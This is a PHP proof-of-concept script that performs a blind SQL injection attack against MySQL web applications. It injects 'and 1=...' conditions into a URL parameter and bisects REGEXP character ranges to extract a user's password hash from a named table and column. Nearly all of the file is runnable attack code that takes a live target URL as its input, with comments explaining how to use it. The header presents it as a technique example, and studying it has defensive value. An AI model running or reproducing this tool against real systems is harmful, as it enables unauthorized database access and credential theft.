<?php

/* * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * 
 *   Example of Regexp Attack in Blind SQL Injection by IHteam
 *   This example work only with MySQL.
 * 
 * 
 *   This program is free software; you can redistribute it and/or modify  
 *   it under the terms of the GNU General Public License as published by  
 *   the Free Software Foundation; either version 2 of the License, or     
 *   (at your option) any later version.                                   
 *                                                                         
 *   This program is distributed in the hope that it will be useful,       
 *   but WITHOUT ANY WARRANTY; without even the implied warranty of        
 *   MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the         
 *   GNU General Public License for more details.                          
 *                                                                        
 * 
 *   Usage:
 * 
 *   ./regexp_bsqli.php http://localhost/page.php?id=1 users password id_user 1
 * 
 * 
 *   WHERE:
 * 
 *   http://localhost/page.php?id=1	->	Vulnerable page with valid id.
 *   users				->	Users Table.
 *   password				->	Password column.
 *   id_user				->	Primary key of users table.
 *   1					->	Valid id_user.
 * 
 * 
 * 
 *   The query will result in:
 *   ... FROM users WHERE id_user = 1 and password ...
 * 
 * 
 * 											Written by Simone Quatrini and Marco Rondini.
 * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * */



$url = $argv[1];  				// the url is like this: "http://localhost/index.php?id=1"
$table_name = $argv[2];				// name of table to extract hash
$column_name = $argv[3];			// column name that contain hash
$id_name = $argv[4];				// primary key to identify a single user
$id_val = $argv[5];				// a real value of key

$chars = array( "a", "b", "c", "d", "e", "f" );					// array of chars
$numbers = array( "0", "1", "2", "3", "4", "5", "6", "7", "8", "9");		// array of numbers

$nquery = 0;

$fchars = 0;					// MIN value for chars array
$lchars = 5;					// MAX value for chars array
$old_lchars = $lchars;

$fnumbers = 0;					// MIN value for numbers array
$lnumbers = 9;					// MAX value for numbers array
$old_lnumbers = $lnumbers;

$counter = array ("0" => 1, "1" => 2, "2" => 3, "3" => 4, "4" => 5, "5" => 6, "6" => 7, "7" => 8, "8" => 9, "9" => 10, "a" => 11, "b" => 12, "c" => 13, "d" => 14, "e" => 15, "f" => 16 );

$urland = $url . "%20and%201=";


$exit = false;
$regexpc = "";
$regexpn = "";
$founded = "";


function search($array, $start, $end, $founded){
	global $urland, $table_name, $column_name, $id_name, $id_val, $and11, $and12, $nquery;
	$old_end = $end;
	$end = floor(($end+$start)/2);
	
	while (1) {
				
		if ( ( $end - $start ) != 1 && ( $start - $end ) != 0) {
			$regexp = "'^" . $founded . "[" . $array[$start] . "-" . $array[$end] . "]'";
			$query = "(SELECT 1 FROM $table_name WHERE $id_name = $id_val and $column_name REGEXP $regexp)";
			$nquery++;
			echo "Page Request: " . $urland . $query . "\n";
			$result = file_get_contents($urland . urlencode($query));
				
			if ( $result == $and12 ) {
				echo "Result : FALSE\n\n";
				$tmp = $start;
				$start = $end + 1;
				$end = $old_end;
			} else {
				echo "Result : TRUE\n\n";
				$old_end = $end;
				$end = floor(($end+$start)/2);
			}
		} else {
			$regexp = "'^" . $founded . $array[$start] . "'";
			$query = "(SELECT 1 FROM $table_name WHERE $id_name = $id_val and $column_name REGEXP $regexp)";
			$nquery++;
			echo "Page Request: " . $urland . $query . " \n";
			$result = file_get_contents($urland . urlencode($query));
			
			if ( $result == $and12 ) {
				echo "Result : FALSE\n\n";
				$regexp = "'^" . $founded . $array[$end] . "'";
				$query = "(SELECT 1 FROM $table_name WHERE $id_name = $id_val and $column_name REGEXP $regexp)";
				$nquery++;
				echo "Page Request: " . $urland . $query . "\n";
				$result = file_get_contents($urland . urlencode($query));
				
				if ( $result == $and12 ) {
					echo "Result : FALSE\n\n";
					$end = $old_end;
				} else
					echo "Result : TRUE\n\n";
				
				$founded .= $array[$end];
				
			} else {
				echo "Result : TRUE\n\n";
				$founded .= $array[$start];
			}
			
			
			return $founded;
		}
	}
}









$and11 = file_get_contents($urland . "1");		// GET page.php?id=1 and 1=1, to identify TRUE statement
$and12 = file_get_contents($urland . "2");		// GET page.php?id=1 and 1=1, to identify FALSE statement

if ( $and11 == $and12 ){				// result of (and 1=1) and (and 1=2) is equal? then not vulnerable!
  echo "Not vulnerabile. Exit.\n";
  exit;
}



while ( ! $exit ) {
	$regexpc = "'^" . $founded . "[" . $chars[$fchars] . "-" . $chars[$lchars] . "]'";				// Generate regexp with chars
	$regexpn = "'^" . $founded . "[" . $numbers[$fnumbers] . "-" . $numbers[$lnumbers] . "]'";			// Generate regexp with numbers
	
	
	$query = "(SELECT 1 FROM $table_name WHERE $id_name = $id_val and $column_name REGEXP $regexpc)";		// Query declaration Example: "(SELECT 1 FROM users WHERE id=1 and password REGEXP '^5[a-f]')"
	$nquery++;
	echo "Page Request: " . $urland . $query . "\n";
  
	$result = file_get_contents($urland . urlencode($query));
  
	if ( $result == $and12 ) {
		echo "Result : FALSE\n\n";
		
		$founded = search($numbers, $fnumbers, $lnumbers, $founded);

		$query = "(SELECT 1 FROM $table_name WHERE $id_name = $id_val and $column_name REGEXP '^$founded\$')";
		$nquery++;
		echo "Page Request: " . $urland . $query . "\n";
		$result = file_get_contents($urland . urlencode($query));
		
		if ( $result == $and11 ) {
			echo "Result : TRUE\n\n";
			$exit = true;
		} else 
			echo "Result : FALSE\n\n";
		
	} else {
		echo "Result : TRUE\n\n";
		
		$founded = search($chars, $fchars, $lchars, $founded);
		
		$query = "(SELECT 1 FROM $table_name WHERE $id_name = $id_val and $column_name REGEXP '^$founded\$')";
		$nquery++;
		echo "Page Request: " . $urland . $query . "\n";
		$result = file_get_contents($urland . urlencode($query));
		
		if ( $result == $and11 ){
			echo "Result : TRUE\n\n";
			$exit = true;
		} else 
			echo "Result : FALSE\n\n";
	}
}


echo "Hash Found.\n";
echo "Hash: $founded\n";
echo "Number of request: $nquery\n";

$md5_arr = preg_split("//", $founded);

$nbrute = 0 ;

foreach ( $md5_arr as $char ){
	if ( ! $char )
		continue;
	
	$nbrute += $counter[$char];
	
}

$nbrute += 16;

echo "Number of request with bruteforce ( 0-9 a-f ): $nbrute\n"; 


?>
